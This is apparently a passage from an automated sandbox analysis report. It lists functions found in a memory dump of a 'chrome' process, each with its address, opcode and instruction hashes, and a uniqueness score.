                            Function 00007FFF7E3F00D8 Relevance: .1, Instructions: 122COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f7072d9f784423f9decff5c5d5d970d5af89abcac20e5b02c016c71965f639b5
                            • Instruction ID: f62f1839b865308138d97e1927e63bfe400405d3f7f18b3ad2727fbb4f0cddc3
                            • Opcode Fuzzy Hash: f7072d9f784423f9decff5c5d5d970d5af89abcac20e5b02c016c71965f639b5
                            • Instruction Fuzzy Hash: FD31D33BB041168BE704EF6CE8854ED77E0EF80335B00453BD185CE252DE29A59B8B95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F00F8 Relevance: .1, Instructions: 107COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 81f5e7671e75f3992882616a3c2621671b7d30d2df3abcaf189576ba671137b9
                            • Instruction ID: a6f5f70f3772ed6ccb004c8346f33690a6a69b464ea2e9a639da454938a41ae5
                            • Opcode Fuzzy Hash: 81f5e7671e75f3992882616a3c2621671b7d30d2df3abcaf189576ba671137b9
                            • Instruction Fuzzy Hash: C531D43BB1410A8BE704EF6CE4895ED77E0EF80335B10053BD185CE252DE39A55B8B95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F0AA0 Relevance: .1, Instructions: 80COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1481ac046bb1a6741105e2df1f09ec8707a79f6a69c2232b787185ac7b0f2b75
                            • Instruction ID: 285d4914f84934e48a0fa7606831a7e2a557abaeadff2eff0619316767bd5edf
                            • Opcode Fuzzy Hash: 1481ac046bb1a6741105e2df1f09ec8707a79f6a69c2232b787185ac7b0f2b75
                            • Instruction Fuzzy Hash: BC11263370C5091FA76C982CAC0B4B7B78BD3C6230B51D32FE597C26AAED65A81341C4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F0140 Relevance: .1, Instructions: 77COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 868ced5c6f81069e5b1cbb552d3c338affeeccba8f15ca583961693946d5a205
                            • Instruction ID: 5182d83a5fd2c464891fdbac5b1a50122478c7a4d9fc1d0bb249db41f337e490
                            • Opcode Fuzzy Hash: 868ced5c6f81069e5b1cbb552d3c338affeeccba8f15ca583961693946d5a205
                            • Instruction Fuzzy Hash: 4221257AA4410A8BE700EFACD8855EEBBF1FF80325F00017BE146DB252DE3995568B91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F0138 Relevance: .1, Instructions: 76COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 552dadd19347d3627d1ac4d3b7832c8edb951dc6c64a9b3855ffe8934009be43
                            • Instruction ID: 2de87f1d6182a03439f21071c3e6146a04d58315a1dc0882b63b9907b0f0e1d7
                            • Opcode Fuzzy Hash: 552dadd19347d3627d1ac4d3b7832c8edb951dc6c64a9b3855ffe8934009be43
                            • Instruction Fuzzy Hash: EB21297AB4410A8BE700EFACD8855EEBBF1FF80325F00057BD141DB252DE3995568B91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F2867 Relevance: .1, Instructions: 75COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6f4501d16a5929ef28fd8c6b07dc4bd3dea0a85e1ab56045d3b68d85ab47eaac
                            • Instruction ID: db95fc18397716a6b64d71b55243186c41f13b04c7140c2f86556c03a667a2d6
                            • Opcode Fuzzy Hash: 6f4501d16a5929ef28fd8c6b07dc4bd3dea0a85e1ab56045d3b68d85ab47eaac
                            • Instruction Fuzzy Hash: 47110D3250C2455FD31DDA758C568A27FE5EF5332031A42AEE4C6CB1B3E5689C07C795
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F0A98 Relevance: .1, Instructions: 67COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7f3638eb3284a9057c2d37a5329c07c9644451e0303acf6463ff447261368fdc
                            • Instruction ID: 37fb5f9851c64d0f854a820129f7686c0d0b216a947b21f1f580b7f7cb8711f3
                            • Opcode Fuzzy Hash: 7f3638eb3284a9057c2d37a5329c07c9644451e0303acf6463ff447261368fdc
                            • Instruction Fuzzy Hash: 2E01F23360C10D1FA21CE869AC4B8F6B78AE782230761523FF4C7C26A2FC65AC1346C4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F221D Relevance: .1, Instructions: 66COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7a4b004eab4b27393fab3c615f998d5d63279802d95bcc7fe5b2104a42e5fb70
                            • Instruction ID: c1647367fe0160359cf30875fe04463e47b1acd4141b9009ff33b20098a27f35
                            • Opcode Fuzzy Hash: 7a4b004eab4b27393fab3c615f998d5d63279802d95bcc7fe5b2104a42e5fb70
                            • Instruction Fuzzy Hash: CF11D63162C7414FC35DDB14C4A28BABBE2FB96301B2485BEE087971D7C928E842C782
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F2251 Relevance: .1, Instructions: 59COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d31bff61aa7b2276a5f0ecbfd4b73da0d838d01f6008494a704691c8ad23bd7d
                            • Instruction ID: 3d131706b20c9c34f3e466dbabce73fb11df088d456249bf49601c7d65ca9c35
                            • Opcode Fuzzy Hash: d31bff61aa7b2276a5f0ecbfd4b73da0d838d01f6008494a704691c8ad23bd7d
                            • Instruction Fuzzy Hash: 791173306287058FC74CDE08C4A197AB7E2FBD9305B24557DE48797296CA34F882CB82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F4FF8 Relevance: .1, Instructions: 54COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0a14bac8daf4315576f632be9a423b734d698ac20dce1efecc264be5c4f1f1e0
                            • Instruction ID: 2058c190a93671645ea46677771246d4355ea896c9bf1394dc914033c4a63a91
                            • Opcode Fuzzy Hash: 0a14bac8daf4315576f632be9a423b734d698ac20dce1efecc264be5c4f1f1e0
                            • Instruction Fuzzy Hash: 53019231B2CA4A4FE798EE288495978BBC2FF98301B0541BFE44FDB292DD29EC415701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F2E87 Relevance: .0, Instructions: 50COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 422b2791af0d54d94431546cf6ab0c797dbf3c06471288b46906c058700df686
                            • Instruction ID: 91d49629e553d3fb7d00c066fd5371edde274060de4c5d157ee2a81acfc9d003
                            • Opcode Fuzzy Hash: 422b2791af0d54d94431546cf6ab0c797dbf3c06471288b46906c058700df686
                            • Instruction Fuzzy Hash: CF01D23154D7C64FC786973488614E57FF1EF9722031942EBD082CB1E3EA58580AC752
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F154C Relevance: .0, Instructions: 49COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5772964717a0bfb5b92853ab9aa6da21f7458f015e380713dfa9ef8c9153e9bd
                            • Instruction ID: eb048440d6ba9ddb25e38bf1ff186c694d149b791576fc5fe027e78e5c26a63b
                            • Opcode Fuzzy Hash: 5772964717a0bfb5b92853ab9aa6da21f7458f015e380713dfa9ef8c9153e9bd
                            • Instruction Fuzzy Hash: AA01A7317282054F875CD62C845146A76E7F7C9705720D23EE0CBC73DACE38E9124A85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F0170 Relevance: .0, Instructions: 45COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a195f16abe4f0b591eedcf8b862078f0b24937e2115d18d5a65c6b77d392cc95
                            • Instruction ID: 6e7a4809a285f121d76140b7251dd6880826d979549ede35e6f78c927de9d322
                            • Opcode Fuzzy Hash: a195f16abe4f0b591eedcf8b862078f0b24937e2115d18d5a65c6b77d392cc95
                            • Instruction Fuzzy Hash: DE110475E4964A8BDB00DF68C8545FEBBF2FF40304F00413AE106EB281DE3856548B81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F0B30 Relevance: .0, Instructions: 41COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 20615e1d9e760c0a59847156be5f84921a3fa1dc8166cfb0eebf4af0d66d8c6c
                            • Instruction ID: d3b044fc288937f37bb7813501404c9eceefa9153e5e0946582df277a563b4ee
                            • Opcode Fuzzy Hash: 20615e1d9e760c0a59847156be5f84921a3fa1dc8166cfb0eebf4af0d66d8c6c
                            • Instruction Fuzzy Hash: 3AF059327158090BC798D5388C548BB77D6EBD4331760033BE007C72A4DD6969428780
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F2650 Relevance: .0, Instructions: 40COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 680f7eb5a5b21fef5b6a2e4c325aa034021110da35bc82019610ee9c8bbb48c7
                            • Instruction ID: 6503893d223f8f7e4fe8e56cdd88c3b0a83572185652a0c3dfb2e11068700b47
                            • Opcode Fuzzy Hash: 680f7eb5a5b21fef5b6a2e4c325aa034021110da35bc82019610ee9c8bbb48c7
                            • Instruction Fuzzy Hash: 57F0283113C7824FD74EAB2484624B9BBE1EF96314B2044BFE087871D3D918F81AC782
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F0EC6 Relevance: .0, Instructions: 40COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1f45a5cbc1549b9502d2c138f2ca22f288a429d1908dc8e4669e096c5d141357
                            • Instruction ID: 88ea6e55dfdb05acbd18853f4bc682fd3631b0b1b4fe999036b5a3324bec8f10
                            • Opcode Fuzzy Hash: 1f45a5cbc1549b9502d2c138f2ca22f288a429d1908dc8e4669e096c5d141357
                            • Instruction Fuzzy Hash: E2F059313293024B870CEA2C84550B4B7CBE785705760A23FF0C7C62D6DD3CE8434985
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F2F0C Relevance: .0, Instructions: 38COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5bcb2b283839b6c307d1d7658a03fdfefae82e2f489bb0b0122db285c078cd81
                            • Instruction ID: 7b188184ac8ada658ac77450f04e55837e92aa403814dcf5050fdb56069a5efb
                            • Opcode Fuzzy Hash: 5bcb2b283839b6c307d1d7658a03fdfefae82e2f489bb0b0122db285c078cd81
                            • Instruction Fuzzy Hash: 39F0F633B186464BE75CD924C8525E9B7D3EBD0320B55863FD1178B1D1ED38B8439640
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F18A3 Relevance: .0, Instructions: 37COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5e5e7a9f87f42e3a4223e6ce3159b1375bad751590e7359dddf870f2f867f3f1
                            • Instruction ID: df1a9c002a0ebe9b5776bde49616c03134322fdb4564b83b65fbc735d5ff5bbe
                            • Opcode Fuzzy Hash: 5e5e7a9f87f42e3a4223e6ce3159b1375bad751590e7359dddf870f2f867f3f1
                            • Instruction Fuzzy Hash: EBF04022F0810A8BE758E828E9809B9B3C2EB90350B00077BC0178A6D2FD29B8474280
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F1E25 Relevance: .0, Instructions: 36COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 64b7b42e76ea806cfa8c0a645dd3c9ad4d95f19c6b3dc94c756e909642edff88
                            • Instruction ID: a56ecf17d5f3c9f42dfffe01467870693ddc589df8adf29c3dfee749764316ab
                            • Opcode Fuzzy Hash: 64b7b42e76ea806cfa8c0a645dd3c9ad4d95f19c6b3dc94c756e909642edff88
                            • Instruction Fuzzy Hash: 66F02732B28A014BD74C992CA9504757697E7C9315724C23EE04BCA3EBCC3CE8178684
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F17BA Relevance: .0, Instructions: 33COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 033ae9118721b047852e158711c62bbd89861c4eebf45aefb4f63a62afe2e998
                            • Instruction ID: b292ea38cff80201b5b35f2681583c2382b11961d2cbe984e46e538fcc35325f
                            • Opcode Fuzzy Hash: 033ae9118721b047852e158711c62bbd89861c4eebf45aefb4f63a62afe2e998
                            • Instruction Fuzzy Hash: 31F0F635B4860A8BD32AD928C4405A5B7D3AB84350B10853AD107CB7DAEE7DB8898740
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F61D8 Relevance: .0, Instructions: 32COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d3963938e91e337199bee60fbe78327b80c3e256b87b05e91eb8edc7695ce05b
                            • Instruction ID: ac164dbe5b98ed95379dd45255650fcff984d1a685ce058849675db8096ee645
                            • Opcode Fuzzy Hash: d3963938e91e337199bee60fbe78327b80c3e256b87b05e91eb8edc7695ce05b
                            • Instruction Fuzzy Hash: 53E09221B14C090FEA94F73D54046A9B5D2EF8821074601B2E40ED3296DD289C428781
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F30DF Relevance: .0, Instructions: 30COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a066b6aee324048a637644da3a89db5c1780da2370ce77bc3aec7a5ced127b05
                            • Instruction ID: 7bd3fc534e0822e135fe240aa3719eba3f7e68ae894ce1f5ddf9c117c4d8f744
                            • Opcode Fuzzy Hash: a066b6aee324048a637644da3a89db5c1780da2370ce77bc3aec7a5ced127b05
                            • Instruction Fuzzy Hash: 51F09233A1801A8BD368ED1DC8504E5B7D1FB6632072443BBE487EB2E2DE5DED528680
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F1BD4 Relevance: .0, Instructions: 28COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 10a0ae0e0a360f452aa97aa48876c07fbff6ca99695830dddfbfc9b7f0e6288b
                            • Instruction ID: d5b5697a9a0f46c323bf5a7db7f4f0367c492c244573b604c465fb461dec977b
                            • Opcode Fuzzy Hash: 10a0ae0e0a360f452aa97aa48876c07fbff6ca99695830dddfbfc9b7f0e6288b
                            • Instruction Fuzzy Hash: 3DF05531B1560A8BD764EE6CC4804A5B793E7D4320B10C2BAC003CB3D9EF38F849C680
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F01FC Relevance: .0, Instructions: 27COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bdb9b18ecf675cce5e23b2c57475698f800d404a7746dde782ab6abed153809e
                            • Instruction ID: 405cab55bcefc26bdd238125cc918f863c3bef99068149b776f9a1a71c0cd786
                            • Opcode Fuzzy Hash: bdb9b18ecf675cce5e23b2c57475698f800d404a7746dde782ab6abed153809e
                            • Instruction Fuzzy Hash: 28F01D74E1510A8FDB44DF68C9845FEBBF1FB44305F108666E415E6250DA389A518F90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F0FDD Relevance: .0, Instructions: 27COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1dc54a00f4ce53527a004c553915e5af73cc41f54eaf411469f3ce52d9c5655c
                            • Instruction ID: 1680e30f7299652ec3fa9ce6cd1339996fd9094b576e7ee6c348d69987caf001
                            • Opcode Fuzzy Hash: 1dc54a00f4ce53527a004c553915e5af73cc41f54eaf411469f3ce52d9c5655c
                            • Instruction Fuzzy Hash: 9DE0CD7375CA47057598511C3C035F9A7C1DB43275754037BE99F845D3E81F640305C4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F26F3 Relevance: .0, Instructions: 25COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 15bb6761f16c42ac76ae75002b22fb834ec3744d3b90e8c689517cc2cd0e87d7
                            • Instruction ID: d588306bda345b0c55db22131a089632c4c05e47df73501627b42b3a4607350b
                            • Opcode Fuzzy Hash: 15bb6761f16c42ac76ae75002b22fb834ec3744d3b90e8c689517cc2cd0e87d7
                            • Instruction Fuzzy Hash: 72E0D83262C6018FC65CDA1CC4624B5B7E2FBD6754764653EE08357281CD28F4038B01
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F0F40 Relevance: .0, Instructions: 24COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 27d68e2be5f8d233cb2edc28b4e65daf69bbbd5cea72082bc378b1b2c66642d0
                            • Instruction ID: 90a638b6efad99b9d3a3ec92a450e47915f45e253b6f4f37a344e470d59167a0
                            • Opcode Fuzzy Hash: 27d68e2be5f8d233cb2edc28b4e65daf69bbbd5cea72082bc378b1b2c66642d0
                            • Instruction Fuzzy Hash: 44E04F2173C64247E68CE65D85164BAB9C5DF95B45F90643EF68FDA1C3CD0CB802588A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F0F81 Relevance: .0, Instructions: 23COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b33582eefdf7bc97d2d2ea3ced03515eb4d3f51bb83eba41c524bde5d42e8371
                            • Instruction ID: 17c5a5cb38781c2616dc249bffc5a330bc609f64d9ca05ada9f91f916d312f68
                            • Opcode Fuzzy Hash: b33582eefdf7bc97d2d2ea3ced03515eb4d3f51bb83eba41c524bde5d42e8371
                            • Instruction Fuzzy Hash: 00E04F31B2EE058B874CEB1C8555179F6D0EF94B05F50157EF08FD6292CE28A9018A86
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F05EC Relevance: .0, Instructions: 22COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 20de7624f0166b3ea822a7d953de3c6e23a0dc8b506a204c2d19dba2217bbf19
                            • Instruction ID: bfca57207017df3862714ec6b6ffc203ca84bbcf342600099e92279189ab088a
                            • Opcode Fuzzy Hash: 20de7624f0166b3ea822a7d953de3c6e23a0dc8b506a204c2d19dba2217bbf19
                            • Instruction Fuzzy Hash: E4E04F30B2878987D64CAB6C405607DB7D2FFC8705F80157EE047CB2C2DF69A8018A43
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F2124 Relevance: .0, Instructions: 20COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0e6d391a8a8fbb237e0088efc2215888640fa58b6d328c4cf8d2060d1f9ca07b
                            • Instruction ID: c15c111373f7ec460532beee01486e75f8b424b54dd45839cdcb930ee1072282
                            • Opcode Fuzzy Hash: 0e6d391a8a8fbb237e0088efc2215888640fa58b6d328c4cf8d2060d1f9ca07b
                            • Instruction Fuzzy Hash: 84E020324096048BD790B624C4449E5FBF1FF50309F104579F08B9B251DE39F941CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00007FFF7E3F2732 Relevance: .0, Instructions: 20COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 0000001E.00000002.527744869.00007FFF7E3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFF7E3F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_30_2_7fff7e3f0000_chrome.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ce44cb4dc0905c3f0416ce929a2ef4e949466193f6a512f628a00c7513d22d2b
                            • Instruction ID: f920f6f66550dc8a099771b3b556cc057c21c8b1d786d458cb4964dccef478d9
                            • Opcode Fuzzy Hash: ce44cb4dc0905c3f0416ce929a2ef4e949466193f6a512f628a00c7513d22d2b
                            • Instruction Fuzzy Hash: E1E01231558708CFD7559A15C041AA6F7E2EF41305F20453AE09B5B692CB39E906C741
                            Uniqueness

                            Uniqueness Score: -1.00%

